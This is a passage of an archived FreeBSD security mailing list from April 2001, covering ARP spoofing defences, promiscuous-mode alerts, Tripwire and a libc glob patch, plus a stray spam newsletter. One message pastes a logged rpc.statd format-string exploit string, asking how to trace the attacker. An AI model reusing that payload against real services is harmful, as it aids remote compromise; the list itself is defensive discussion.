(hc6526bd1.dhcp.vt.edu [198.82.107.209]) by hub.freebsd.org (Postfix) with ESMTP id B193B37B423 for ; Fri, 20 Apr 2001 10:55:57 -0700 (PDT) (envelope-from clash@tasam.com) Received: from battleship (hc6526bd1.dhcp.vt.edu [198.82.107.209]) by zogbe.tasam.com (8.11.3/8.11.3) with SMTP id f3KHtsc29164; Fri, 20 Apr 2001 13:55:54 -0400 (EDT) Message-ID: <007b01c0c9c3$238fb480$dc02010a@battleship> From: "Joseph Gleason" To: =?iso-8859-1?Q?P=E4r_Thoren?= , References: Subject: Re: static arp values Date: Fri, 20 Apr 2001 13:55:51 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org When you do arp -a, is the static entry you set marked as permanent? Did you simulate anouther box taking that IP and look at the arp table afterward? Also, you should be aware that some cards allow you to change the MAC address of the card. (At least I think so...never tried it) So an evil machine could steal the MAC address and fool the switch into sending it your traffic. Depending on how advanced your switch is and if it is managable, you can hardcode what MAC address is on what port...avoid this one as well. ----- Original Message ----- From: "Pär Thoren" To: Sent: Friday, April 20, 2001 13:13 Subject: static arp values > Hi! > > > Is it possible to make a arptable entry static? For example the arp adress > of my gateway. So that man-in-the-middle attack can be prevented. > > > I´ve tried "arp -S ip-adres mac-adres" but it seems that it is still > possible to infect the arptable with a false mac adress of the gateway and > sniff the connection. > > > /Pär > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 11: 1:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr1.ericy.com (imr1.ericy.com [208.237.135.240]) by hub.freebsd.org (Postfix) with ESMTP id E72C237B423 for ; Fri, 20 Apr 2001 11:01:27 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr5.exu.ericsson.se (mr5u3.ericy.com [208.237.135.124]) by imr1.ericy.com (8.10.2/8.10.2) with ESMTP id f3KI1RB05605; Fri, 20 Apr 2001 13:01:27 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr5.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f3KI1OT20481; Fri, 20 Apr 2001 13:01:24 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f3KI1Np01771; Fri, 20 Apr 2001 14:01:23 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Fri, 20 Apr 2001 14:01:22 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id 2N3XLGNA; Fri, 20 Apr 2001 14:01:19 -0400 From: "Antoine Beaupre (LMC)" To: Peter Pentchev Cc: freebsd-security@FreeBSD.ORG Message-ID: <3AE0796E.E5DBCD3E@lmc.ericsson.se> Date: Fri, 20 Apr 2001 14:01:18 -0400 Organization: LMC, Ericsson Research Canada X-Mailer: Mozilla 4.7 [en]C-CCK-MCD (WinNT; U) X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: promiscuous mode References: <20010419161503.A1527@ringworld.oblivion.bg> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That would fit nicely as a FAQ answer. A. Peter Pentchev wrote: > > On Thu, Apr 19, 2001 at 08:10:45AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > > I have a 4.2-RELEASE box that is going into, and out of, promiscuous mode > > on the xl0 interface. What would cause this ? Is it a sign of a potential > > problem ? > > 'Promiscuous mode' means that the kernel starts processing - and passing > to userland programs - ethernet frames that are not targeted to this machine > only. This means somebody (usu. root ;) is running a packet capture program - > either tcpdump, or some traffic analysis utility, or - if none of the above - > possibly a packet sniffer. In the last case, you should be alarmed. > > If you are not running tcpdump or some traffic analysis program, or if there > are times that you are not running those, but the interface still goes into > or out of promiscuous mode, then yes, this is a sign of a potential intrusion. > > G'luck, > Peter > > -- > I am the thought you are now thinking. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- La sémantique est la gravité de l'abstraction. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 11:14:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id F145A37B423 for ; Fri, 20 Apr 2001 11:14:24 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id LAA17562; Fri, 20 Apr 2001 11:14:23 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17560; Fri Apr 20 11:14:12 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3KIE6p05737; Fri, 20 Apr 2001 11:14:06 -0700 (PDT) Message-Id: <200104201814.f3KIE6p05737@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdBA5732; Fri Apr 20 11:13:21 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group X-Sender: cyschubert To: nate@yogotech.com (Nate Williams) Cc: Cy Schubert - ITSD Open Systems Group , Raoul Schroeder , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process In-reply-to: Your message of "Fri, 20 Apr 2001 10:43:13 MDT." <15072.26401.630643.257226@nomad.yogotech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 20 Apr 2001 11:13:21 -0700 From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <15072.26401.630643.257226@nomad.yogotech.com>, Nate Williams writes : > > > > Take your system off the net and check it for signs of intrusion. > > > > > > > > Kris > > > > > > Just a quick question: How does one check for signs of intrusion. The Fre > eBSD > > > handbook does not really talk a lot about this. > > > Is there a good documentation about this? > > > > Install an IDS immediately after installation, then use it. This is > > not a 100% solution but IMO one of the better solutions in your toolkit. > > Unfortunately, the most common IDS out there require your machine be > more 'open' than necessary. > > (ie; you leave the system open, and it closes them down with firewall > entries, rather than just leaving the non-used ports closed down.) Actually, the IDS I had in mind was Tripwire. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 12:41:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 9E74A37B43C for ; Fri, 20 Apr 2001 12:41:06 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id A72FC66B1C; Fri, 20 Apr 2001 12:41:04 -0700 (PDT) Date: Fri, 20 Apr 2001 12:41:04 -0700 From: Kris Kennaway To: Brian Tiemann Cc: Kris Kennaway , Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem Message-ID: <20010420124104.A75540@xor.obsecurity.org> References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com> <20010419194710.A58378@xor.obsecurity.org> <3AE0780F.BAF16352@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Qxx1br4bt0+wmkIi" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AE0780F.BAF16352@packeteer.com>; from briant@packeteer.com on Fri, Apr 20, 2001 at 10:55:27AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Qxx1br4bt0+wmkIi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Fri, Apr 20, 2001 at 10:55:27AM -0700, Brian Tiemann wrote: > Okay-- I've solved this problem (for the edification of the rest who > are in my boat) by cvsupping back to RELENG_4_2_0_RELEASE, applying the > glob patch, rebuilding and reinstalling /usr/src/lib/libc and > /usr/src/libexec/ftpd, and then cvsupping back to RELENG_4. You now have a libc which was built from different sources from the rest of your userland. It may all work, but there's no guarantee; for example if a userland utility depends on a libc interface which was only added after 4.2-R, it will now fail. This is why I suggested that a buildworld is the only safe way of rebuilding, if you're tracking -STABLE. > Just a curiosity point, though... would I have been able to do a make > buildworld, then make install only /usr/src/lib/libc? Just trying to see > if that would have been a viable alternative that I could recommend to > others... No, because your entire libc has changed (not just the glob() function), and other things may depend on it. You can only get away with doing partial installs if the relevant changes to the file are small, and you manually take into account all possible dependencies. Kris --Qxx1br4bt0+wmkIi Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE64JDQWry0BWjoQKURAn30AJ4i36TlgGqhyCdnckdzr45+wegjtQCfZWBY gXwP9w86bR+2gxZ4xftwlPk= =mzd2 -----END PGP SIGNATURE----- --Qxx1br4bt0+wmkIi-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 13: 1: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from urdvg001.cms.usa.net (urdvg001.cms.usa.net [165.212.11.1]) by hub.freebsd.org (Postfix) with SMTP id D018C37B424 for ; Fri, 20 Apr 2001 13:01:01 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 10937 invoked from network); 20 Apr 2001 20:01:01 -0000 Received: from uadvg128.cms.usa.net (165.212.11.128) by corprelay.cms.usa.net with SMTP; 20 Apr 2001 20:01:01 -0000 Received: (qmail 2741 invoked by uid 0); 20 Apr 2001 20:01:00 -0000 Received: USA.NET MXFirewall, messaging filters applied; Fri, 20 Apr 2001 20:01:00 GMT Received: from packeteer.com [207.78.98.2] by uadvg128 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 709FDTua80318M16; Fri, 20 Apr 2001 20:00:59 GMT Message-ID: <3AE095B3.B4A018EB@packeteer.com> Date: Fri, 20 Apr 2001 13:01:55 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com> <20010419194710.A58378@xor.obsecurity.org> <3AE0780F.BAF16352@packeteer.com> <20010420124104.A75540@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > You now have a libc which was built from different sources from the > rest of your userland. It may all work, but there's no guarantee; for > example if a userland utility depends on a libc interface which was > only added after 4.2-R, it will now fail. This is why I suggested > that a buildworld is the only safe way of rebuilding, if you're > tracking -STABLE. Actually, no... the rest of my userland is also from 4.2-RELEASE, which is why I decided to try this solution. The way I run my systems is by maintaining a full -RELEASE install, then tracking -STABLE with nightly cvsups so I can do point installs on contrib or userland software when there are security patches. I don't do interim make worlds on production servers-- that's way too risky, IMO, and not least because of the reason you just outlined (the only way to recover on an interim system is to do another make world). In this case, though, we had a core-level system patch (in libc), so it seemed the best way to attack it would be to go back and patch the -RELEASE sources, since the only things that have changed in my installed system since 4.2-RELEASE are security related point fixes (ntpd, bind, sshd, that sort of thing). I think it's a sound scheme. (It's effectively the same as if I didn't do cvsups at all, and just applied security patches to -RELEASE sources.) > > Just a curiosity point, though... would I have been able to do a make > > buildworld, then make install only /usr/src/lib/libc? Just trying to see > > if that would have been a viable alternative that I could recommend to > > others... > > No, because your entire libc has changed (not just the glob() > function), and other things may depend on it. You can only get away > with doing partial installs if the relevant changes to the file are > small, and you manually take into account all possible dependencies. Yeah... it'll probably work the way I run things, but I'll refrain from recommending this solution to others in case they try it on a system that doesn't have all its ducks in a row (or has been interim-rebuilt). Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 13: 7:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 1F43037B422 for ; Fri, 20 Apr 2001 13:07:11 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 17C1266B1C; Fri, 20 Apr 2001 13:07:06 -0700 (PDT) Date: Fri, 20 Apr 2001 13:07:06 -0700 From: Kris Kennaway To: Brian Tiemann Cc: security@FreeBSD.ORG Subject: Re: Another glob problem Message-ID: <20010420130706.A86071@xor.obsecurity.org> References: <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com> <20010419194710.A58378@xor.obsecurity.org> <3AE0780F.BAF16352@packeteer.com> <20010420124104.A75540@xor.obsecurity.org> <3AE095B3.B4A018EB@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="opJtzjQTFsWo+cga" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AE095B3.B4A018EB@packeteer.com>; from briant@packeteer.com on Fri, Apr 20, 2001 at 01:01:55PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --opJtzjQTFsWo+cga Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Fri, Apr 20, 2001 at 01:01:55PM -0700, Brian Tiemann wrote: > (It's effectively the same as if I didn't do cvsups at all, and just > applied security patches to -RELEASE sources.) Oh, okay -- yes, sounds fine. Kris --opJtzjQTFsWo+cga Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE64JbqWry0BWjoQKURAgRUAJwLV0Maz0IGjc9GREhXBiS8SGuzpQCgoAnY wzaLGTJZWmiqig0NYge8+fc= =1Fml -----END PGP SIGNATURE----- --opJtzjQTFsWo+cga-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 13:12: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 6CA4637B42C for ; Fri, 20 Apr 2001 13:12:00 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA17932; Fri, 20 Apr 2001 13:11:26 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda17930; Fri Apr 20 13:11:16 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3KKBBD06669; Fri, 20 Apr 2001 13:11:11 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdnz6663; Fri Apr 20 13:10:26 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3KKAQL13623; Fri, 20 Apr 2001 13:10:26 -0700 (PDT) Message-Id: <200104202010.f3KKAQL13623@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdt13592; Fri Apr 20 13:10:08 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Ragnar Beer Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tripwire or the like for FreeBSD ? In-reply-to: Your message of "Fri, 20 Apr 2001 10:34:21 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 20 Apr 2001 13:10:08 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Ragnar Beer writes: > Has anybody looked at http://sourceforge.net/projects/tripwire/ ? > There's a GPL'd version (2.3.1-2) of Tripwire. I got the impression > that over mtree Tripwire has the advantage of a more finegrained > control. I'm currently whittling away on the upcoming Tripwire 2.3.1-2 port. The new port compiles and installs ok. The only thing left to complete is the creation of a default FreeBSD policy file, which in my estimation is about 20% complete. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC > > Ragnar > > >Hopefully I am not being too dense, but what about the Tripwire-1.2 in the > >security ports? > > > >SM > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 13:37:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from obelix.rby.hk-r.se (obelix-b.student.bth.se [194.47.132.4]) by hub.freebsd.org (Postfix) with ESMTP id A868437B422 for ; Fri, 20 Apr 2001 13:37:49 -0700 (PDT) (envelope-from t98pth@student.bth.se) Received: from helios.kna.hk-r.se (helios [194.47.153.5]) by obelix.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id f3KKblM02042; Fri, 20 Apr 2001 22:37:47 +0200 (MEST) Received: from localhost (t98pth@localhost) by helios.kna.hk-r.se (8.9.3+Sun/8.9.3) with ESMTP id WAA27500; Fri, 20 Apr 2001 22:38:24 +0200 (MEST) X-Authentication-Warning: helios.kna.hk-r.se: t98pth owned process doing -bs Date: Fri, 20 Apr 2001 22:38:23 +0200 (MEST) From: =?ISO-8859-1?Q?P=E4r_Thoren?= X-Sender: t98pth@helios To: Joseph Gleason Cc: freebsd-security@freebsd.org Subject: Re: static arp values In-Reply-To: <007b01c0c9c3$238fb480$dc02010a@battleship> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 20 Apr 2001, Joseph Gleason wrote: > When you do arp -a, is the static entry you set marked as permanent? yes it is >=20 > Did you simulate anouther box taking that IP and look at the arp table > afterward? >=20 Yes I did. And the arp is infact what it is suppose to be. So it appear static. (when i did the same thing on w2k, arp -s, the mac adress=20 changed). But I can still sniff the connection between the machine with the static arp value and the router. That is what I find strange. I simulate the man-in-the-middle attack with ettercap by the way. > Also, you should be aware that some cards allow you to change the MAC > address of the card. (At least I think so...never tried it) So an evil > machine could steal the MAC address and fool the switch into sending it y= our > traffic. >=20 > Depending on how advanced your switch is and if it is managable, you can > hardcode what MAC address is on what port...avoid this one as well. >=20 > ----- Original Message ----- > From: "P=E4r Thoren" > To: > Sent: Friday, April 20, 2001 13:13 > Subject: static arp values >=20 >=20 > > Hi! > > > > > > Is it possible to make a arptable entry static? For example the arp adr= ess > > of my gateway. So that man-in-the-middle attack can be prevented. > > > > > > I=B4ve tried "arp -S ip-adres mac-adres" but it seems that it is still > > possible to infect the arptable with a false mac adress of the gateway = and > > sniff the connection. > > > > > > /P=E4r > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 14:17:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from obelix.rby.hk-r.se (obelix-140.rby.hk-r.se [194.47.140.4]) by hub.freebsd.org (Postfix) with ESMTP id 948E437B43E for ; Fri, 20 Apr 2001 14:17:19 -0700 (PDT) (envelope-from t98pth@student.bth.se) Received: from helios.kna.hk-r.se (helios [194.47.153.5]) by obelix.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id f3KLHIM10330 for ; Fri, 20 Apr 2001 23:17:18 +0200 (MEST) Received: from localhost (t98pth@localhost) by helios.kna.hk-r.se (8.9.3+Sun/8.9.3) with ESMTP id XAA27510 for ; Fri, 20 Apr 2001 23:17:55 +0200 (MEST) X-Authentication-Warning: helios.kna.hk-r.se: t98pth owned process doing -bs Date: Fri, 20 Apr 2001 23:17:55 +0200 (MEST) From: =?ISO-8859-1?Q?P=E4r_Thoren?= X-Sender: t98pth@helios To: freebsd-security@freebsd.org Subject: rpc.statd attack Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok when I get portscanned...but these guys tries to exploit my ass. Apr 20 23:09:05 z rpc.statd: invalid hostname to sm_stat: ^X=F7=FF=BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF= ^[=F7=FF=BF^[=F7=FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%= nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P I guess it=B4s the old linux rpc.statd epxloit. But how can I see what IP did this? Does rpc.statd log this information by default? /P=E4r To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 14:19:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id C856A37B509 for ; Fri, 20 Apr 2001 14:18:59 -0700 (PDT) (envelope-from bounce-fwd-newswire-2059532@nova.sparklist.com) X-Mailer: Lyris Web Interface Date: Fri, 20 Apr 2001 15:21:53 -0500 Subject: FirewireDirect Gets A New Spark Mime-Version: 1.0 To: "FirewireDirect.com" From: "FirewireDirect NewsWire" Content-Type: multipart/alternative; boundary="============newsletter============" List-Unsubscribe: Reply-To: "FirewireDirect.com" X-Hosted-By: http://SparkLIST.com/ - The Business Email List Experts Message-Id: <20010420211859.C856A37B509@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --============newsletter============ Content-Type: text/plain; charset="iso-8859-1" ; format="flowed" Content-Transfer-Encoding: quoted-printable FirewireDirect is happy to announce the debut and immediate availability of the newest in our series of FireWire storage solutions, the 2.5" Spark II FireWire & USB Portable Hard Drive. The new design means we've retired the number of the original Spark, the popular mobile hard drive that launched our line of FireWire solutions. We've replaced it with an even smaller chassis, and added USB for extra flexability. Come by our web site to see the new package, and order this weekend to receive FREE SHIPPING. Spark II 10GB HDD - $259 Spark II 20GB HDD - $329 Spark II Firewire Enclosure Kit - $119 This offer ends Tuesday, April 24, 200. This is a special offer to subscribers to this list. Please see our web site for info about these offers. --- You are currently subscribed to fwd-newswire as: freebsd-security@freebsd.org To unsubscribe send a blank email to leave-fwd-newswire-2059532E@nova.sparklist.com or visit our subscription page at http://firewiredirect.com/company/newswire/subscribe.shtml --============newsletter============ Content-Type: text/html; charset="iso-8859-1" ; Content-Transfer-Encoding: 8bit
FirewireDirect Newswire April 20, 2001
If you have trouble seeing this email, please click here for help.
FirewireDirect is happy to announce the debut and immediate availability of the newest in our series of FireWire storage solutions, the 2.5" Spark II FireWire & USB Portable Hard Drive.

The new design means we've retired the number of the original Spark, the popular mobile hard drive that launched our line of FireWire solutions. We've replaced it with an even smaller chassis, and added USB for extra flexability.

Come by our web site to see the new package, and order this weekend to receive FREE SHIPPING.

Spark II 10GB HDD - $259

Spark II 20GB HDD - $329

Spark II Firewire Enclosure Kit - $119

This offer ends Tuesday, April 24, 200. This is a special offer to subscribers to this list. Please see our web site for info about these offers.

You received this message because you subscribed to the FirewireDirect Newswire.

You are currently subscribed to fwd-newswire as:
freebsd-security@freebsd.org
To unsubscribe send a blank email to
leave-fwd-newswire-2059532E@nova.sparklist.com
Or visit our subscription page at
http://firewiredirect.com/company/newswire/subscribe.shtml


To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 14:23:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 9E93637B423 for ; Fri, 20 Apr 2001 14:23:14 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Fri, 20 Apr 2001 16:25:16 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 16:25:16 -0500 From: freebsd-security@freebsd.org () To: fwd-newswire-request Subject: # Mail sent to leave-fwd-newswire was converted to these commands: unsubscribe end # This is the text of the message that triggered the action: Return-Path: Received: from nova.sparklist.com ([207.250.144.28]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Fri, 20 Apr 2001 16:25:16 -0500 From: freebsd-security@freebsd.org () To: leave-fwd-newswire@nova.sparklist.com Subject: your subscription request IP:24.113.38.176 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 14:23:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) 